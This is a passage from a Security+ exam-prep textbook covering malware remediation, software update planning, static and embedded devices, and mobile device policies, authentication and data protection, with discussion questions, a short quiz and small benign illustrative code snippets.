probably just an IT worker on an errand, but that assumption can also enable a daylight theft.


Discussion: Host security


1. Examine your current workstation. Does it have account control and file permissions set securely?
Answers may vary.
2. Is the operating system up to date?
Answers may vary. You can check for updates.
3. Are your network applications up to date?
Answers may vary.
4. What security software is installed?
At the least there should be antimalware and firewall software.
5. Is your workstation physically secure?
Answers may vary.
6. Does your organization have a formal security baseline for employee workstations?
Answers may vary.

Removing malware
The process for repairing an infected system is pretty straightforward, but even if you follow it precisely that
doesn't make it easy. Wiping away some malware is simple, but other infections can dig very deeply into the
operating system and require elaborate or creative removal methods.

1. Identify symptoms that suggest the presence and nature of installed malware.
2. Quarantine the infected system.
3. In Windows, disable System Restore.
4. Repair the infected system.
a) Update antimalware software.
b) Use scanning and removal tools.
5. Update the system and schedule future scans.
6. Enable System Restore and create a new restore point.
7. Educate the end user and document findings.


Quarantining systems
Once you've determined that a system likely has malware, you need to immediately quarantine it until the
situation is resolved. If you don't, the malware could easily spread through the network or storage devices.

 Isolate any removable storage devices that have been recently connected to the computer, or backups
that might have been made since infection. They'll need to be scanned, and shouldn't come into contact
with other systems.
 Disable all network shares, file sharing applications, or other ongoing connections to other computers.
 Identify and isolate other computers that might be infected. Any systems that regularly share files or
synchronize data with the infected system are at risk. Contact other technicians or network
administrators to see if similar symptoms have appeared elsewhere.
 Limit network connectivity. Disconnecting from the network entirely is the surest way, but if you need to
download tools or definition updates from the infected computer, just do your best to isolate it from
other computers on the local network.

Remediating infected systems


Actually removing malware is its own troubleshooting process. You'll have to choose tools, verify findings,
and apply creative solutions as necessary, but there are some general steps and techniques you'll have to keep in
mind.

 Always use updated tools. Effective security software is updated frequently, even with daily definitions.
Outdated software can be useless against a new threat.
 Combine multiple tools, especially when the system might have multiple separate infections. Specialized
antispyware scanners can find what common antivirus monitors do not, and even two different brands of
the same type of scanner might find very different results. Run one tool, then the other: trying to scan the
system with two at once can hurt the performance of both.
 Run multiple scans to verify malware removal. In particular, if you think the system is clean, reboot and
then scan it again.
 If the system won't boot normally, or if particularly well-protected malware can't be completely
removed, try safe mode, restore environments, bootable rescue discs, or removal tools targeted to the
specific infection.
 Don't forget to scan removable media that may have been infected.
 After the malware is removed, you may need to reconfigure or reinstall services and applications
affected by it, or restore data from a clean backup.


Securing repaired systems


Odds are that a newly repaired system is going to encounter malware again, and if it got infected last time it's
likely it's still vulnerable. Immediately after the repair process, you need to harden the system again and make
sure it's more secure than it was when it was infected.

 Update all potentially vulnerable software: not only the operating system and antimalware applications,
but network applications such as browsers along with their add-ons and plugins.
 Schedule regular security scans and definition/OS updates. Even if a program doesn't include scheduled
scans, you can run it through Task Scheduler.
 Prevent worms by disabling unnecessary services and tightening firewall protections.
 Examine system and application settings to look for other security problems.
 If you can find out how the system was infected, take more specific measures to prevent recurrence. For
example, if users are installing trojan horse programs, you might consider restricting user permissions or
revising user policies to prohibit unauthorized software.

Following up on repairs
Your work isn't done once the system is working. Especially if user error led to the infection or delayed its
discovery, you need to notify the user. You also need to document your findings, and present them to system
administrators or management.

 Discuss your findings with any users that might be involved with the infection.
• Try to learn more about when and how the problem began, and what actions the user took.
• Instruct the user about your organization's security policies, as well as best practices to avoid future
infection from the same or similar threats.
• Describe what signs there might be if the threat wasn't completely removed, and ask the user to contact
you if there's any recurrence.
 Document your findings and the steps you took to resolve any problems.
 Report your findings to network administrators and other appropriate management.
• Include any potential risks elsewhere on the network.
• Notify them of any provable or suspected human attacks or policy violations.
• Point out specific policy changes or technical controls which could reduce chances of the event
recurring.


Software changes
It's easy to see software changes as less consequential than hardware changes, especially when you wake
up every morning to a notification of which apps on your phone were updated overnight. That's a dangerous
assumption on a secure network. Leaving aside major changes such as operating system or application
upgrades, even fairly minor updates can sometimes cause problems. The risk is higher on networks using
custom or legacy software that might rely on old or undocumented features prone to changing unexpectedly.
Larger networks have the added challenge of needing to roll the same changes out across a wide variety of
systems at the same time in order to preserve compatibility. On a tightly managed network, all software
updates should be part of a patch management process, even if not all need the same level of scrutiny. Making
it even more complicated, protecting against new threats means that security updates need to be installed
quickly across all hosts.

Exam Objective: CompTIA SY0-501 3.3.2.2


There is no shortage of software components that need updating, too. Even on the smallest network you want
to check for updates regularly on host operating systems, device drivers, motherboard or router firmware, and
application software. On a large network, you might have a central solution for updating like systems, but as
much as that decreases work, it also carries risks of its own. It doesn't help that "update" can mean almost
anything, and the other terms used are often casually interchanged or at the least are used differently by
different manufacturers.

Major vs. minor Terms used by some manufacturers to distinguish between large changes to software
updates and minor bugfixes. The two might be distinguished by name or by version
numbering scheme.
Patch A public update intended to correct a single bug, vulnerability, or other issue.
Generally a patch won't add or improve any features, just fix shortcomings. It's
possible that vulnerability patches might simply shut down a vulnerable service until
it can be fixed in a later release.
Hotfix An update for a very specific issue, which may or may not be public or recommended
for most users. Sometimes a hotfix represents something so urgent that it can't wait
for a normal update release process, or even just something that can be applied to a
running system or service with no downtime.
Service pack A large compilation of all patches and other updates to an operating system or
application, designed to be installed all at once. Service packs sometimes include new
features, though generally only if they're intended to solve major shortcomings in the
original software. For example, Windows XP Service Pack 2 introduced a firewall
application because it had become apparent, since XP's initial release, that every
computer on the Internet needed one. Commonly a service pack is seen as a new
compatibility baseline for other software.
Upgrade A new software version, which may include entirely new features and operation. For
commercial software, upgrades may be new, paid products, but they might also be
free. Either way, upgrades give the fewest guarantees of continued compatibility with
existing systems.
Maintenance release A compilation of patches and hotfixes intended to fix multiple issues. Maintenance
releases bridge the gap between service packs or software versions and are generally
smaller than either.
Definition update Updates to a software database, typically the definition lists used by antivirus or other
security software.

Unofficial patch A patch, maintenance release, or service pack created by a third party, such as a
software community instead of by the software manufacturer. Frequently found with
older or discontinued software or in other cases where the original manufacturer is
unable or unwilling to address issues.
Rolling release Software that doesn't use discrete versions, but instead a constantly updating
development cycle that keeps the software up to date but complicates keeping
specific versions for compatibility. Used in many Linux releases, though similar
principles apply to many other constantly updating applications.

Planning software updates


In general, planning software updates should fit right into your general change management process. Like any
other category of change, it has particular concerns you need to address, and questions you need to answer.

Exam Objective: CompTIA SY0-501 2.4.8

1. Evaluate whether the update is actually necessary. Just because it's released doesn't mean you need it, and
any change to the network introduces risk.
• Security- or stability-related updates should generally be installed unless you have a reason not to.
• Compatibility patches usually are only important if they apply to your particular situation. For
example, a motherboard firmware update that adds new processor support should be ignored unless
you plan to install one of those processors.
• Performance fixes or feature enhancements should be individually considered according to your needs
and their potential impact.
• Major updates need more examination than minor ones.
• Sometimes you may need to downgrade to an older software revision when a problem is recognized.
2. Consider the impact of the update, and perform research on potential problems.
• Device firmware updates have a high level of risk, since a problem can render the system inoperable.
• Operating system and device driver updates can also cause serious problems, but the worst case is
usually recovery from backup.
• User application updates can include changes to document or database formats, possibly impairing
interoperability with users of older versions of the same software.
• Matching client and server applications may need to be updated at the same time.
• Software updates may introduce dependencies; in order to update one application, you might first need
to install or update another.
• Updates of any type of software may change or reset configuration settings.
3. Plan the update process.
• Ensure that you have all necessary access permissions.
• Make necessary backups of systems, data, or configuration settings. You might not be able to back up
configuration settings directly; in that case, document them, so they can be manually reset if necessary.
• Downgrades are generally less supported than upgrades and sometimes might require more complex
procedures or even a full re-installation.
• Some updates can be introduced gradually on the network, while others must be completed all at once.
• Use patch management software to deploy or track updates across entire systems or networks.
4. Enact and finalize the update like any other network change.


Discussion: Software updates


1. Have you ever had a software update not go as planned? If so, what happened?
Answers may vary.
2. What could have prevented the problem?
Answers may vary.
3. Does your organization have a formal process for host software updates?
Answers may vary.

Static environments
When you think of hosts to be secured, you'll understandably first consider the workstations and servers on the
network, running Windows, OS X, Linux, or what have you: all general-purpose computers with a wide
variety of software that you can easily configure (or misconfigure) however you like. That's a reasonable
starting point, since those systems do a lot of work and present a large part of your network's security risks;
it just isn't a complete perspective.

Exam Objective: CompTIA SY0-501 1.6.2, 3.3.2.1.4, 3.3.2.1.5, 3.5


Your workplace is probably full of static devices: specialized or limited computers with tightly integrated
software and operating systems, not as easily configured and updated as a typical desktop host but still
functioning as computers and even network hosts. Most use a system on a chip (SoC) architecture, and a
minimalist operating system. The latter might be a simple custom program, a real time operating system
(RTOS) designed for instant response in time-critical devices, or just a stripped-down version of Linux or
some other operating system designed first for general-purpose computers.
You might not even think of many static devices as computers, so much as appliances needing little
maintenance and posing little security risk. While it's true that many of them have limited capability and a
small attack surface, they still often have vulnerabilities and have even been targeted by major attacks. Static
devices aren't a unified whole, but rather a variety of hardware and software architectures that serve a variety
of purposes.

Embedded devices Embedded devices with custom software running on flash firmware are everywhere.
Many are internally fairly capable computers, and can have significant security risks.
Network appliances like switches, routers, and WAPs are the most obvious targets.
So are network-attached security devices such as alarms or IP camera systems.
Others include network printers and multifunction devices (MFDs), smart TVs and
game consoles, HVAC control systems, and any Bluetooth-enabled device.
Kiosks Interactive kiosks and related internet kiosks are a special case. Some are embedded
devices running specialized operating systems, but many use fully capable
workstation operating systems that just run kiosk software as a user shell. In the
latter case especially, the kiosk needs all the security a real public workstation would,
plus configuration to make sure that unauthorized users in no way can bypass the
kiosk software or install and run unauthorized programs.
Smart devices One class of embedded device that's gotten a lot of attention recently is the Internet
of Things (IoT), a general term for computerized versions of ordinary devices and
appliances which can connect to each other or to general-purpose computers. They
include home appliances, lighting or HVAC controls, and wearable appliances such
as smart watches and medical sensors. Unfortunately, they're often designed with
security as an afterthought.

SCADA/ICS Supervisory control and data acquisition or industrial control system standards are
widely used for networked industrial equipment. Traditionally they used different
architectures and networks from general purpose computers, but converging systems
have left them open to attack. The Stuxnet virus was the first high profile attack
against industrial systems.
Mainframe Mainframes, at least those with significantly different software environments than
ordinary servers, are often overlooked when it comes to security. While they may be
subject to fewer attacks, they're still full-scale computing environments that can be
compromised.
Mobile devices Android or iOS devices are fully-featured computers which need to be secured.
Fortunately they tend to need less configuration than desktops and laptops, but you
might not have full control of mobile devices on your network, or be able to secure
work-related data completely on a user-owned device. Additionally, older devices
may no longer receive updates, leaving known vulnerabilities unpatched.
In-vehicle computing Modern vehicles are equipped with increasingly complex computing systems, used for
systems GPS navigation, engine controls, and more. White hat hackers have already
demonstrated the ability to take remote control of vehicles using onboard Wi-Fi, and
the actual risk of attack is present but not fully understood. Aircraft are even more
heavily computerized than ground vehicles, and in theory any unmanned aerial
vehicle (UAV) can be completely taken over by an attacker.
Legacy systems While older computers running end-of-life (EOL) software aren't technically static
devices, they share some of the same problems: once vendors stop supporting them
you can't update them to meet new threats. If you have some critical old application
that will only run on some ancient operating system, you can't harden it the same
way as you would a modern host, and it might not even run modern security
software. At the same time, the attacks that targeted it haven't gone away.


Alternative threat mitigation


Sometimes static devices aren't a major security risk and you don't need to take special measures to protect
them. When they are, especially if there's a known threat, you need to do your best to harden them by
alternative means. Since you don't have the same freedom to configure and harden them that you do ordinary
hosts, you'll need to use manual methods or the surrounding network and environment.

Note: All of these techniques are equally applicable for conventional networks that need high security.
It's just that when a static device has a security problem your options for mitigating it directly are
limited.

Security layers Apply defense in depth, securing vulnerable systems in layers. That way, a failure
in one control is less likely to be crippling.
Control redundancy and Redundant controls, such as firewalls, can add security: if one fails, the other is
diversity still there. It's most effective when the redundant controls are also diverse, that is,
different in nature or from different vendors. Two firewalls from two different
vendors are likely to have different weaknesses, so that an attacker able to breach
one might not be able to affect the other.
Network segmentation Using subnets or VLANs, place vulnerable devices on different network segments
where they're less susceptible to attack or less able to infect other hosts if
compromised. For instance, SCADA systems should be segmented from ordinary
data networks, and guest Wi-Fi should be isolated from the corporate network.
Application firewalls Application layer firewalls can give more intelligent protection against network
threats than traditional firewalls.
Wrappers Legacy systems or other vulnerable devices can be encased in a hardware,
software, or network wrapper that intercepts all communications meant for the
device and handles security for it. Functionally, it's like adding a complete
firewall/antivirus/IDS solution to a system that can't otherwise run them.
Firmware version control Many firmware-based devices receive regular security updates just like any other
operating system. They seldom update automatically, so you might need to
manually apply updates as they're released. Sometimes third-party firmware is
available for outdated devices, but make sure it's both secure and compatible
before applying it.

Discussion: Managing static environments


1. What static devices or unconventional hosts are on your network?
Answers may vary.
2. What measures are in place to protect them from attack?
Answers may vary.
3. How could you take extra steps to protect devices at risk?
Answers may vary, but most involve updates and network-level protections.


Assessment: Securing hosts


1. What was the first version of Windows to include real-time antivirus scanning? Choose the best response.
 Windows XP Service Pack 2
 Windows Vista
 Windows 7
 Windows 8
 Windows 8.1

2. In general, you should leave the Guest account in Windows disabled. True or false?
 True
 False

3. A company configures workstations only to run software on an approved list. What is this an example of?
Choose the best response.
 Blacklisting
 Hardening
 Sandboxing
 Whitelisting

4. A service pack is generally a more major update than a maintenance release. True or false?
 True
 False

5. Downgrades are often more difficult than upgrades. True or false?


 True
 False

6. What security feature makes it more difficult for an attacker to trick you into installing a fraudulent
Ethernet driver that reports on your network activities? Choose the best response.
 Code signing
 Firewall
 HIDS
 Trusted hardware

7. What potential security risk does an SD card pose that a USB thumb drive does not? Choose the best
response.
 Data exfiltration
 Malware
 Photographs of sensitive areas
 Wireless attacks


Module C: Mobile device security


Even if modern mobile devices are full-featured computers in their own right and face the same kinds of
threats as workstations, the actual risk posed by a given threat might be very different. For example, while
smartphones and tablets tend to run few services vulnerable to network attacks, they're far more likely to be
stolen than a desktop. This is one reason it's even more important to use backup functions or cloud storage on
a device storing important data. It's also why mobile devices have many operating system functions, hardware
features, and software applications designed to make devices and their contents useless to a thief or nosy
discoverer.
You will learn:
 How to plan mobile device policies
 About mobile authentication features
 About mobile data protection
 About security concerns with mobile applications

Mobile device risks


On the surface, mobile devices seem more secure than desktops or laptops. Mobile operating systems are
relatively hardened out of the box, application permissions are centrally managed, and applications
themselves run in sandboxes with limited ability to affect the operating system or other applications. In fact,
on most devices it's prohibited or difficult to run apps that didn't come from a trusted app store, or sometimes
to connect the device to another carrier's network. Even the hardware being more tightly integrated means it's
harder to make unauthorized changes. Operating system vulnerabilities on newer devices are usually patched
quickly, due to automatic over the air (OTA) firmware updates.

Exam Objective: CompTIA SY0-501 2.5.3, 3.3.2.1.6


Like any security measures, these restrictions aren't absolute or unbreakable. It's possible for a user to root or jailbreak a
device to gain full administrative control: while this is useful, it can compromise security, especially when an
employee performs an unauthorized jailbreaking of a company-owned device. Even more serious is a
malicious or careless user installing custom firmware that may already be compromised.
Malware can still get on a mobile device through operating system exploits, with or without a jailbroken
device. Trojans are possible too: third-party app stores might have fewer security checks, and it's even
possible to sideload an app over USB, Wi-Fi, or just from a memory card. Suspicious software has even made
its way onto trusted app stores now and then.
When in the hands of a malicious user, or even "just" compromised by malware, a mobile device is a perfect
data exfiltration tool. Their built-in cameras and microphones can gather sensitive information, and location
systems can use geotagging to mark or send location data along with other information. Many mobile devices
have removable microSD cards in addition to their internal storage, and any device that supports USB OTG is
just one adapter cable away from connecting to any USB storage device.
The wireless networking capabilities of a mobile device let it steal data without even leaving the facility, no
matter how secure your LAN is. A device can send information out via cellular networks without even
connecting to local computers, or it can tether local computers to its cellular connection via a USB connection
or Wi-Fi. They can also use Wi-Fi Direct or ad hoc networking to connect directly to other Wi-Fi devices.
Finally, mobile devices are often used with mobile payment technologies that let you make purchases using
the device instead of a physical payment card. While these technologies have security features, they still leave
it technically possible for a compromised phone to wipe out its owner's bank account too.


As serious as all these risks are, they're all things you can deal with. In a high-security environment, outside
mobile devices should be searched for and monitored like any other portable storage or recording device, and
mobile hotspots are just another form of rogue AP. Mobile devices which are actually joined to your network
can be secured like other hosts and outfitted with monitoring software to prevent misuse, albeit with some
mobile-specific technologies and policies.

Mobile deployment models


To maintain a secure IT organization, it's important to apply a consistent security policy to all devices on the
premises, on the network, or otherwise coming into contact with sensitive information. In the old days this
was easy: employee workstations and the occasional laptop were all owned by the company and could be
controlled as strictly as desired. The popularity of mobile devices doesn't make this strictly impossible—
secure facilities might ban private devices from the premises or at least from accessing company resources—
but it's no longer the normal assumption.

Exam Objective: CompTIA SY0-501 2.5.4


Before you can create mobile device policies, you need to decide on a deployment policy that determines what
kind of mobile devices employees can use for work purposes, or bring onto the premises or network. There
are four primary approaches.

COBO Corporate Owned, Business Only devices are purchased by the organization and only used for
business purposes. This gives the organization total control over what devices are used and how
they are configured. This can be unpopular with employees since they may need to juggle two
devices or be forbidden from having a personal device on the job, but it's the most secure option.
BYOD Bring Your Own Device is the other extreme: employees can use their own personal devices for
work purposes or within the company network. For small organizations with simple security
policies this is the easiest model, and it's popular with employees. The drawbacks are that
maintaining a strict mobile security policy is much more difficult both because of the wide range
of possible devices and because users will resent having limited control over their own property.
COPE Corporate Owned, Personally Enabled is a more relaxed version of COBO: devices are company-
issued and supported, but employees can use them for personal reasons too. Exactly what apps
they can install and use, or other acceptable use policies, are still up to the employer.
CYOD Choose Your Own Device is a stricter version of BYOD: employees can choose from a list of
devices the company has approved for security features and support. Employees might be expected
to pay for their own device, or the company might subsidize its purchase. CYOD is still harder to
secure and support than corporate-owned devices, but easier than BYOD.
VDI Virtual Desktop Infrastructure clients are available for mobile devices. Some are even virtual
mobile infrastructure tools designed for mobile devices in the first place. Either one allows
employees to use personal devices to remotely access a virtual environment that's under company
control. This doesn't solve every security problem with BYOD policies, but it does mitigate many of them.

Some organizations might use a mix of these deployment models, depending on factors like job role.
Allowing devices which are used both for work and personal tasks poses several challenges both for keeping
the organization secure and to avoid conflict between employees and management.


Mobile device policies


Regardless of what deployment model is in place, every organization should have security policies for mobile
devices.

Permitted devices Required features, operating systems, or models for a device to be allowed under
the policy. Broader device support is more attractive to users, but more difficult to
support and secure.
Security baselines User devices still must be configured to standard security baselines. A BYOD
baseline might be more lenient than a company device baseline when it comes to
user applications, but it should be similar when it comes to patch management,
antivirus, account security, and data protection.
Support ownership Who supports what aspects of device functions. IT may not have the time or
training to support everything that can go wrong on a wide range of user devices,
but users may lack the technical skills and security awareness to keep their own
devices configured to baseline standards.
App and data ownership Policies should clearly specify what apps and data are company property, for
example work email messages and corporate documents. Access to
communications such as SMS/MMS texts should also be spelled out.
IP theft protection User owned devices are an excellent way for a malicious employee to steal
sensitive data or commit industrial espionage. Some secure facilities prohibit all
mobile devices in certain sensitive areas. Others might simply require employees
to agree to random search of any devices they bring onto company property.
Company-owned devices can also have DLP software installed.
Other legal concerns Especially relevant if user-owned devices might be used for data or duties covered
by special laws or regulatory requirements, but important for any BYOD policy.
Policies should spell out liability in case of device misuse, and how adherence to
legal standards, NDAs, and other contracts can be verified. They should also have
clear guidelines for company access to forensic data in the event of a security
incident.
Privacy Employees should expect some privacy with personal activities and data on their
own devices, but at the same time it might be limited during work hours or on
company networks. The policy should spell out employee privacy expectations.
Network access Some workplaces may choose to limit personal devices to limited access or guest
networks. This can limit their usefulness, but makes it easier to secure them.
Acceptable use policy Just because user-owned devices are allowed to be used on work networks or
during business hours doesn't mean they can be used for everything. If user
devices are kept to a different AUP than company devices, it needs to be made
clear to users; if they are kept to the same AUP, that point needs to be reinforced.
The same is true of any other corporate policies for computer use.
Onboarding and There should be a set process for how an employee needs to prepare a device to
offboarding join the program, and another for what happens when an employee leaves or just
stops using a particular device for work. Offboarding should also address what
happens with devices subsidized by the company.
User acceptance Once the policy is in place, you'll need to test user adherence to it, look for
problems, and remediate any issues with training or compliance.


Profile security requirements


Regardless of who owns the mobile devices employees are using, you need to ensure that they all are
consistently secured. Useful policies to standardize include:

Exam Objective: CompTIA SY0-501 2.5.2.2

 Passcode requirements
 Device encryption and other security settings
 Backup policies
 Update policies
 Required or forbidden apps
 Physical security procedures
 Acceptable use

Especially in a large organization, it's easiest if you can centrally administer devices in order to assign device
permissions, verify security compliance, apply updates, or even monitor activity. Software designed for these
tasks is called Mobile Device Management (MDM) and encompasses a wide variety of features. Some MDM
solutions are primarily designed to configure multiple devices remotely, while others primarily manage
permissions granted to different devices on the corporate network; many combine elements of both.
Enterprise MDM software typically operates using security profiles, usually text-based files encoded in
XML format. A given profile might apply to a specific category of user, or role of device; it can include
security settings, apps, network access permissions, and anything else needed to configure the device to the
profile's needs. A given device might have multiple profiles applied—sometimes this means having to resolve
conflicts between them. As you might imagine, BYOD devices are likely to have different profiles assigned
than corporate-owned ones.
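
As a toy illustration of the profile concept, the sketch below parses a made-up XML profile and pulls out its
settings. The element and attribute names are invented for the example; each MDM product defines its own
schema (Apple's .mobileconfig files, for instance, are property lists rather than this format).

# Sketch of reading a hypothetical MDM security profile. The XML structure
# below is invented for illustration only.
import xml.etree.ElementTree as ET

PROFILE_XML = """
<profile name="byod-standard">
  <setting key="min_passcode_length" value="6"/>
  <setting key="require_encryption" value="true"/>
  <setting key="allow_camera" value="false"/>
</profile>
"""

def load_profile(xml_text):
    """Return the profile name and a dict of its key/value settings."""
    root = ET.fromstring(xml_text)
    settings = {s.get("key"): s.get("value") for s in root.findall("setting")}
    return root.get("name"), settings

name, settings = load_profile(PROFILE_XML)
print(name, settings)
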
Along with mobile device management is mobile content management (MCM) software, which delivers
centrally hosted data or services to mobile devices. MCM can include data encryption, secure connections to
web applications, and DLP software functions.
Mobile security policies aren't strictly for smartphones and tablets: many of the same principles you need to
consider apply to laptops, and tablets running Windows or other desktop operating systems. You should also
consider security principles for removable media devices such as USB drives and SD cards, whether they're
intended to be used with desktops, laptops, or smartphones and tablets. Disabling or restricting removable
media helps keep sensitive data from easily being lost or stolen, and reduces vectors for incoming malware.

Mobile authentication
There are a lot of dilemmas involved when designing a mobile operating system, even once you're used to a
workstation OS, and a number of them are related to security. One of the big ones is that it's far easier to set
down a phone or tablet where strangers can try to get access, or for a thief to just walk off with it and guess
passwords at their leisure. At the same time, while you might log on to your workstation for hours at a time,
you probably often
use your phone for just a moment while hurrying through your day, so making it difficult to access
undermines a lot of its advantages. On top of that, while most mobile devices are only regularly used by a
single person so aren't configured with multiple user accounts, now and then you might want to let someone
borrow yours for a bit even if you don't trust them to go sifting through everything you have on it.

Exam Objective: CompTIA SY0-501 2.5.2.4, 2.5.2.10


Mobile operating systems, and to some extent laptops running workstation operating systems, use a
combination of operating system features and third party apps to address these problems. First, mobile
operating systems by default quickly activate a screen lock on idle devices. In principle it's just like a
password-protected screensaver, but in addition to passwords, the lock screen can also be secured by PINs or
patterns that are easier to enter without a keyboard. Alternatively, the device can have a biometric scanner allowing a
fingerprint or even the user's face to unlock it. To allow temporary access for users, you could lock the device
while allowing access to a single app, or mark specific apps as requiring special authentication.
Mobile authentication problems aren't just limited to signing onto the device itself, but also when users want
to access network services from their devices. Since mobile devices are harder to control or fingerprint than
workstations, it can be hard to be certain a user is connected from their own device, or that the device hasn't
been compromised. One solution is more complex context-aware authentication methods that take additional
factors into account, such as the device's location, or the data or resources being accessed.
A closely related concept in mobile authentication is geofencing, or using location data from a mobile device
in order to allow or restrict access to applications or device features. For example, geofencing software could
be used to disable a device's camera in sensitive areas of the building, or to restrict viewing of particularly
sensitive data in public areas where it might be read by unauthorized users.
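
As a simple sketch of the geofencing idea, the Python below decides whether a device's reported coordinates
fall within an allowed radius of a site and gates a hypothetical camera feature on the result. The coordinates
and radius are made up, and real MDM geofencing also has to account for location accuracy and spoofed
GPS data.

# Toy geofence check: permit a device feature only outside a sensitive area.
from math import radians, sin, cos, asin, sqrt

SITE = (43.1566, -77.6088)     # hypothetical facility location (lat, lon)
RADIUS_M = 200                 # geofence radius in meters

def distance_m(a, b):
    """Great-circle distance between two (lat, lon) points, in meters."""
    lat1, lon1, lat2, lon2 = map(radians, (*a, *b))
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371000 * asin(sqrt(h))

def camera_allowed(device_location):
    """Disable the camera whenever the device is inside the sensitive area."""
    return distance_m(device_location, SITE) > RADIUS_M

print(camera_allowed((43.1570, -77.6090)))     # inside the fence, so False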

Screen lock options


Every mobile operating system includes screen lock features. Windows tablets simply use the same lock
screens workstations do. With iOS the exact options available will depend on your OS version and the model
of your device. With Android, you also can download third party authentication apps, and your device
manufacturer might have installed custom software already. On a modern device, several options might be
available.

Exam Objective: CompTIA SY0-501 2.5.2.6, 2.5.2.8, 2.5.2.9

Swipe screen Swipe a finger across the screen, or a certain part of the screen, to unlock. This doesn't offer
any security against intrusion at all: at best, it prevents accidental input.
Password A strong password provides very strong authentication, but it's more trouble to enter on a
touchscreen keyboard than a physical one, especially if it includes mixed cases and special
characters.
Passcode/PIN Unlock the device with a numeric passcode. Not as strong as a password, but easier to enter,
and even a four-digit PIN allows for 10,000 combinations.
Pattern Unlock the device by drawing a predefined pattern over points on the screen. This can be
easier than a passcode, but choosing a pattern that's both easy to enter and hard to guess
might be challenging.
Fingerprint A device with a fingerprint scanner isn't entirely foolproof: it's not just spy-movie stuff for a
clever hacker to make a "fake finger" from some glue and an existing fingerprint smudge on
the screen. That said, it's strong protection against most intruders.
Face Uses the device camera and face recognition software. Can potentially be fooled by using a
photo, but newer versions add additional measures like requiring the user to blink.

Some screen locks have additional security features. Commonly, too many failed attempts will temporarily
lock the phone entirely in order to prevent brute force hacking—you'll have to wait anywhere from thirty
seconds to an hour to try again. In iOS, and some Android apps, you can even configure the device to
permanently erase all data after a set number (usually ten) of failed attempts. This can be very potent protection for
important data, but it makes it easy for a child or mischievous adult to wipe the whole device. Another feature
is a little more subtle: by configuring the camera on the front of the device to take a photo of anyone entering
a wrong code, you can see who it was later.
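
The sketch below models one way such a lockout policy might behave: a few free attempts, escalating delays
after that, and an optional wipe after too many failures. It's purely illustrative of the logic and doesn't reflect
any particular vendor's implementation.

# Illustrative failed-attempt lockout logic (not any vendor's actual policy).
FREE_ATTEMPTS = 5       # attempts allowed before delays begin
WIPE_AFTER = 10         # optional: erase the device after this many failures
BASE_DELAY_S = 30       # first delay; doubles with each further failure

def response_to_failure(failed_attempts):
    """Describe what the device does after the Nth consecutive failed unlock."""
    if failed_attempts >= WIPE_AFTER:
        return "erase all data (if the wipe option is enabled)"
    if failed_attempts > FREE_ATTEMPTS:
        delay = BASE_DELAY_S * 2 ** (failed_attempts - FREE_ATTEMPTS - 1)
        return "lock input for {} seconds".format(delay)
    return "allow another attempt immediately"

for attempt in range(1, 12):
    print(attempt, "->", response_to_failure(attempt))
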
Many people don't use strong, or often any, security on mobile devices because it's a pain to unlock a device
you intermittently access all day. As one way around this, some devices let you add widgets to the lock screen
that show commonly accessed data. For example, you could check the time and weather on your phone
without unlocking it. Others allow shortcuts to functions that can be used without unlocking, like taking
photos or making phone calls. Some of these options can compromise security so should be used with care.


Discussion: Mobile device policies


1. Does your organization have a BYOD policy? If so, what are its important terms?
Answers may vary.
2. Does your organization issue company-owned mobile devices? If so, what policies govern their security?
Answers may vary.
3. How are your mobile devices locked?
Answers may vary.

Mobile data protection


On its own, even a strong lock screen shouldn't be seen as real protection for a device or its data: any system is
much easier to break into when the thief can take it home and work on it at leisure. Simple passcodes can
eventually be broken, and thieves are always compiling or researching security vulnerabilities. SD cards can be
removed and accessed in other devices; while accessing internal memory on a mobile device is harder than
taking the hard drive out of a workstation, it's not impossible either. If you really want your device and its data
to remain secure, you'll want to do more than set a passcode.

Exam Objective: CompTIA SY0-501 2.5.2.3, 2.5.2.12, 2.5.2.13


The best option is to recover the device itself, especially if it's just lost rather than stolen. As long as the
software's set up ahead of time and you have location tracking enabled, Apple's Find my iPhone and Google's
Android Device Manager both allow you to use networking and GPS features to find where a device was last
located from any web browser. If it's on and connected to the network, you can also remotely lock it, remote
wipe its data, or, if you might have just left it in your other coat, make it ring remotely.

MDM software commonly has inventory control features designed to track device ownership and location as
well. Even if location features are disabled, some organizations place RFID chips into company-owned
devices, then use asset tracking systems to locate them at least over short distances.
Even if you can't recover the device, you can recover data using remote backup applications. On an iOS
device, you can configure a daily backup of data via the iCloud service. Android includes automatic cloud
backup of contacts, calendars, and mail, but more complete solutions are available as apps. Some of these
features can even be used to track a phone, for example if a thief turned the device on long enough that it
backed itself up.


To make sure the data is safe from attackers, most modern devices allow full device encryption to protect all
stored data and even that on microSD cards. By using a key which is built into the device and cannot be
extracted, full device encryption can protect all data on the device with strong encryption, even if someone
tries to read removable storage in another device. All iOS devices running version 8 or newer have encryption
enabled by default, so as long as you use a strong passcode the data is protected. By contrast, almost all
Android devices support encryption, but few have it enabled by default so you'll need to set it up in Settings >
Security. Encrypting removable devices such as microSD cards is an additional option.
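
This isn't how iOS or Android implement it internally (they rely on hardware-backed keys and filesystem-level encryption), but the underlying idea of protecting data at rest with a key the device holds can be sketched with a symmetric cipher. This example uses the third-party Python cryptography package purely as an illustration.

    from cryptography.fernet import Fernet

    device_key = Fernet.generate_key()   # on a real device this lives in secure hardware
    cipher = Fernet(device_key)

    ciphertext = cipher.encrypt(b"contacts, messages, photos...")
    # Without device_key, the ciphertext on flash storage or an SD card is unreadable
    plaintext = cipher.decrypt(ciphertext)
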
Some devices and applications allow for storage segmentation, separating a particular part of device storage
that can be encrypted and controlled separately from the rest. Some storage segmentation applications even
provide encrypted communications for the protected data and applications. This is especially popular for
BYOD configurations: you can define an encrypted container for business-related files and applications, and
worry less about how user data is protected.
Remember, all of these methods need to be configured before the device is lost: if you wait, there's not much
you can do.

Mobile application security


Mobile applications have most of the same security concerns and features desktop applications do, but the
details are different. In particular, since mobile operating systems are much newer and are designed for more
tightly controlled application ecosystems, a lot of security concerns are more centrally and consistently
managed. At the same time, since the operating environment is designed to be less directly managed by the
user and more determined by the device manufacturer or mobile provider, fine control over security can be
more difficult.

Exam Objective: CompTIA SY0-501 2.5.2.1, 2.5.2.5, 2.5.2.7, 2.5.3.11, 2.5.3.12

Application Mobile app stores and developers digitally sign executable files to show that they're
whitelisting genuine and unaltered. By default, most mobile devices won't run applications not
from trusted sources, greatly reducing the chance of trojan horses and other malware.
MDM software adds additional whitelisting options, allowing you to determine what
software is allowed to run on company devices.
Key and credential Mobile applications typically store cryptographic keys, account information, and other
management credentials in a central repository on the device, so that you can view them and back
them up from device settings. Much like on a web browser, stored credentials can be a
